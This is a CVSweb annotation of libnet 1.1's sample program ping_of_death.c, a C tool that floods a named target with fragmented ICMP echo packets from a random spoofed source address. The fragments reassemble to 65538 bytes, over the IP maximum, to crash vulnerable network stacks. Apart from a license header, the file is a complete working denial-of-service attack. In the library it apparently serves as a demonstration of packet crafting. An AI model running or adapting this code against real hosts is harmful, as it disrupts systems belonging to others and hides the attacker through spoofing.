Annotation of embedaddon/libnet/sample/ping_of_death.c, revision 1.1
1.1 ! misho 1: /*
! 2: * $Id: ping_of_death.c,v 1.2 2004/01/03 20:31:01 mike Exp $
! 3: *
! 4: * libnet 1.1
! 5: * ICMP ping of death attack
! 6: *
! 7: * Copyright (c) 1998 - 2004 Mike D. Schiffman <mike@infonexus.com>
! 8: * All rights reserved.
! 9: *
! 10: * Copyright (c) 1999 - 2001 Dug Song <dugsong@monkey.org>
! 11: * All rights reserved.
! 12: *
! 13: * Redistribution and use in source and binary forms, with or without
! 14: * modification, are permitted provided that the following conditions
! 15: * are met:
! 16: * 1. Redistributions of source code must retain the above copyright
! 17: * notice, this list of conditions and the following disclaimer.
! 18: * 2. Redistributions in binary form must reproduce the above copyright
! 19: * notice, this list of conditions and the following disclaimer in the
! 20: * documentation and/or other materials provided with the distribution.
! 21: *
! 22: * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
! 23: * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
! 24: * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
! 25: * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
! 26: * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
! 27: * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
! 28: * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
! 29: * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
! 30: * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
! 31: * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
! 32: * SUCH DAMAGE.
! 33: *
! 34: */
! 35:
! 36: #if (HAVE_CONFIG_H)
! 37: #include "../include/config.h"
! 38: #endif
! 39: #include "./libnet_test.h"
! 40:
! 41:
! 42: #define FRAG_LEN 1472
! 43:
! 44: int
! 45: main(int argc, char **argv)
! 46: {
! 47: libnet_t *l;
! 48: libnet_ptag_t ip;
! 49: libnet_ptag_t icmp;
! 50: struct libnet_stats ls;
! 51: u_long fakesrc, target;
! 52: u_char *data;
! 53: int c, i, flags, offset, len;
! 54: char errbuf[LIBNET_ERRBUF_SIZE];
! 55:
! 56: printf("libnet 1.1 Ping of Death[raw]\n");
! 57:
! 58: /*
! 59: * Initialize the library. Root priviledges are required.
! 60: */
! 61: l = libnet_init(
! 62: LIBNET_RAW4, /* injection type */
! 63: NULL, /* network interface */
! 64: errbuf); /* errbuf */
! 65:
! 66: if (l == NULL)
! 67: {
! 68: fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
! 69: exit(EXIT_FAILURE);
! 70: }
! 71:
! 72: if (argc != 2 || ((target = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE) == -1)))
! 73: {
! 74: fprintf(stderr, "Usage: %s <target>\n", argv[0]);
! 75: exit(EXIT_FAILURE);
! 76: }
! 77:
! 78: /* get random src addr. */
! 79: libnet_seed_prand(l);
! 80: fakesrc = libnet_get_prand(LIBNET_PRu32);
! 81:
! 82: data = malloc(FRAG_LEN);
! 83: for (i = 0 ; i < FRAG_LEN ; i++)
! 84: {
! 85: /* fill it with something */
! 86: data[i] = 0x3a;
! 87: }
! 88:
! 89: ip = LIBNET_PTAG_INITIALIZER;
! 90: icmp = LIBNET_PTAG_INITIALIZER;
! 91:
! 92: for (i = 0 ; i < 65536 ; i += (LIBNET_ICMPV4_ECHO_H + FRAG_LEN))
! 93: {
! 94: offset = i;
! 95: flags = 0;
! 96:
! 97: if (offset < 65120)
! 98: {
! 99: flags = IP_MF;
! 100: len = FRAG_LEN;
! 101: }
! 102: else
! 103: {
! 104: /* for a total reconstructed length of 65538 bytes */
! 105: len = 410;
! 106: }
! 107:
! 108: icmp = libnet_build_icmpv4_echo(
! 109: ICMP_ECHO, /* type */
! 110: 0, /* code */
! 111: 0, /* checksum */
! 112: 666, /* id */
! 113: 666, /* sequence */
! 114: data, /* payload */
! 115: len, /* payload size */
! 116: l, /* libnet handle */
! 117: icmp); /* libnet ptag */
! 118: if (icmp == -1)
! 119: {
! 120: fprintf(stderr, "Can't build ICMP header: %s\n", libnet_geterror(l));
! 121: goto bad;
! 122: }
! 123: /* no reason to do this */
! 124: libnet_toggle_checksum(l, icmp, 0);
! 125:
! 126: ip = libnet_build_ipv4(
! 127: LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H + len, /* length */
! 128: 0, /* TOS */
! 129: 666, /* IP ID */
! 130: flags | (offset >> 3), /* IP Frag */
! 131: 64, /* TTL */
! 132: IPPROTO_ICMP, /* protocol */
! 133: 0, /* checksum */
! 134: fakesrc, /* source IP */
! 135: target, /* destination IP */
! 136: NULL, /* payload */
! 137: 0, /* payload size */
! 138: l, /* libnet handle */
! 139: ip); /* libnet ptag */
! 140: if (ip == -1)
! 141: {
! 142: fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
! 143: goto bad;
! 144: }
! 145:
! 146: c = libnet_write(l);
! 147: if (c == -1)
! 148: {
! 149: fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
! 150: }
! 151:
! 152: /* tcpdump-style jonks. */
! 153: printf("%s > %s: (frag 666:%d@%d%s)\n", libnet_addr2name4(fakesrc,0),
! 154: argv[1], LIBNET_ICMPV4_ECHO_H + len, offset, flags ? "+" : "");
! 155: }
! 156:
! 157: libnet_stats(l, &ls);
! 158: fprintf(stderr, "Packets sent: %lld\n"
! 159: "Packet errors: %lld\n"
! 160: "Bytes written: %lld\n",
! 161: ls.packets_sent, ls.packet_errors, ls.bytes_written);
! 162: libnet_destroy(l);
! 163: free(data);
! 164: return (EXIT_SUCCESS);
! 165: bad:
! 166: libnet_destroy(l);
! 167: free(data);
! 168: return (EXIT_FAILURE);
! 169: }
! 170:
! 171: /* EOF */
FreeBSD-CVSweb <freebsd-cvsweb@FreeBSD.org>
![[BACK]](/icons/cvsweb/back.gif){kind=icon}
Return to ping_of_death.c CVS log ![[TXT]](/icons/cvsweb/text.gif){kind=icon}
![[DIR]](/icons/cvsweb/dir.gif){kind=icon}
Up to [ELWIX - Embedded LightWeight unIX -] / embedaddon / libnet / sample